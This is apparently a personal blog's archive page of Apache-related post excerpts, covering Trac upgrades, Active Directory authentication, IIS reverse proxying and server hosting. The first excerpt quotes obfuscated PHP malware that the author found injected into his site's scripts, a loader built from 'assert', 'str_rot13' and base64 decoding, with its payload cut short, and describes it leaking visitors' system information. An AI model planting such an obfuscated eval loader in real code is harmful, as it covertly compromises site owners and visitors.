Apache on

Battle against injected PHP

Sun, 13 Nov 2016 14:18:51 +0000

My main personal web server became infected with some effin malware that was injected it very nearly every single .php script on the server. The injected code was basically:

//###=CACHE START=### @error_reporting(E_ALL); @ini_set(“error_log”,NULL); …etc

$strings = “as”; $strings .= “se”; $strings .= “rt”; $strings2 = “st”; $strings2 .= “r_r”; $strings2 .= “ot13”; $gbz = “riny(”.$strings2(“base64_decode”); $light = $strings2($gbz.’(“nJLtX….”));’); $strings($light); //###=CACHE END=###

This is kind of beautiful to me, it took me a little while to figure out what it does. In effect it causes basic system info for anyone browsing sites on that server to be sent off to some other php script on another server. At first I altered the server and my network to prevent any traffic from reaching the intended target. Instead I captured the traffic so I could get a look at the volume of it. Here’s an example apache log message generated by someone browsing an infected site:

Dear Diary: Running Trac and upgrading to Ubuntu Server 14.04

Wed, 17 Sep 2014 17:17:20 +0000

I’m a fairly heavy user of trac. I’ve got various software projects I organize using trac. I decided to upgrade one of my Ubuntu 12.04 servers to Ubuntu 14.04 and of course ran in to the typical apache2 headaches that are born out of this particular transition.

After remembering to rename my virtual host files with .conf extensions (I find that change annoying as hell on its own), I kept running aground with an Internal Server Error message to which I couldn’t even find a hint in my logs, even after cranking up the verbosity.

Trac Authenticating Through Active Directory

Mon, 26 Sep 2011 10:06:18 +0000

A minor post - mostly for my own notes..

I was setting up an instance of Trac and I wanted Active Directory authentication going. I’ve had this before, but I recently learned of Centrify which provides a VERY easy means to setup system authentication with AD. This meant I needed to find a Centrify-specific way to get AD authentication going in Trac.

I was close to an obvious simple solution for a fair while, but I kept running in to error messages like:

Dawning.ca Spruced Up

Fri, 15 Jan 2010 03:12:36 +0000

Previous Dawning.ca Layout

I’ve just spent a few hours re-designing the layout of Dawning.ca. The old one served me very well and I really liked it. I had heavily modified the previous theme to work for me and work it did. I may tap it some time in the future as a backup… As you can see to the right, the new style is fairly different compared to the image. Although I kept the workflow as I think it was already pretty good.

YouTube Grabber App

Tue, 24 Nov 2009 12:06:27 +0000

I’ve whipped up this little YouTube video grabber for myself and I’ve opened it up for the moment. If I see it getting spammed or abused in some way, I’ll probably password protect it, nevertheless, you can check it out here.

What it does

This little app takes a YouTube video link and then adds the reference in a database. A seperate script then polls that database and looks for new URLs. It then uses another script (that I did not write), called yt-download, to fetch each video and dump it to my fileserver.

Webserver replaced, again..

Sun, 13 Sep 2009 12:14:26 +0000

Howdy, so I’ve returned to hosting my site on a professional connection rather than over my lameo home setup. I’ve grown tired of n00bful downtime due to power outages, ISP outages, people tripping over cables or gnomes screwin around.

As such, dawning.ca is now hosted on a server I’ve got running down in Texas with the valuable help of Linode. That’s all for now folks.

Update

I ran in to some interesting configuration problems with this new server that was causing it to frequently run out of memory. I think I’ve resolved those matters with some real help of this article.

The Anti-Epic Tale of Making IIS Play Nice with Apache

Wed, 24 Jun 2009 14:04:56 +0000

The Mission

To run an Apache server (on Windows) on the same machine that was already hosting IIS.

The Strategy

The plan was to alter each virtual host defined in IIS to not bind to the typical HTTP/HTTPS ports (80 & 443), but instead have it use arbitrary ports (was to be 8080 & 4433). With that in place, I could then run Apache normally. In order to get traffic to hit the right sites as hosted by IIS, the apache server would have it’s own virtual host definitions for each IIS site. In those definitions, there would be a Reverse Proxy config to get Apache to pass the traffic internally over to the arbitrary ports.

Ubuntu Samba Apache Active Directory Authentication

Wed, 16 Jul 2008 07:16:25 +0000

So I’ve spent some time for something at work figuring out how to get an Ubuntu server to authenticate users with a Windows 2003 Server Active Directory. Using the process I’ve found by combining various sources, my instructions show how to get a machine setup such that users logging in to the shell, accessing a samba share and checking out a website (or sub-directory of one) can all be authenticated using credentials centrally stored in a separate Active Directory server.